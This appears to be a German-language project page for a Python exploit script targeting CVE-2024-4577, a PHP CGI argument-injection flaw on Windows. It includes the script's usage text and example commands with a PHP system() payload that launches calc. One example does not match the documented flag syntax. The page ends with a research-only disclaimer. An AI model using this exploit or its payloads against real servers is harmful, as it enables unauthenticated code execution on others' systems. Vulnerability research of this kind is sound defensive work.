
Python-Exploit für CVE-2024-4577 PHP CGI argument injection, die nicht authentifizierte Remotecodeausführung auf Windows-Servern mit bestimmten Gebietsschemata ermöglicht.
Die CVE-2024-4577-Sicherheitslücke in PHP CGI hat sich als kritischer Sicherheitsfehler erwiesen, der durch Argument Injection eine Remote-Code-Ausführung ermöglicht. Diese in mehreren PHP-Versionen entdeckte Schwachstelle betrifft hauptsächlich Server, die in bestimmten Locales (Traditionelles Chinesisch, Vereinfachtes Chinesisch, Japanisch) unter Windows laufen.
Der Fehler nutzt den PHP CGI-Modus aus, um frühere Sicherheitsmaßnahmen zu umgehen und nicht authentifizierten Angreifern die Ausführung beliebigen Codes zu ermöglichen.
Exploit-Skript:
usage: python exploit.py -t http://127.0.0.1 -c calc
options:
-h, --help show this help message and exit
--target TARGET, -t TARGET
Target URL
--code CODE, -c CODE OS command to execute
--php PHP, -p PHP PHP command to execute
Beispiel:
python3 exploit.py 192.168.130.100 80 calc
python .\CVE-2024-4577.py -t http://127.0.0.1 -p "<?php system('calc') ?>"

Dieses Exploit-Skript wurde ausschließlich zu Forschungszwecken und zur Entwicklung effektiver Verteidigungstechniken erstellt. Es ist nicht für böswillige oder unbefugte Aktivitäten vorgesehen. Der Autor und Besitzer des Skripts lehnt jegliche Verantwortung oder Haftung für Missbrauch oder Schäden durch diese Software ab. Nur damit Sie es wissen: Benutzer werden aufgefordert, diese Software verantwortungsvoll und nur in Übereinstimmung mit geltenden Gesetzen und Vorschriften zu verwenden. Verwenden Sie es verantwortungsvoll.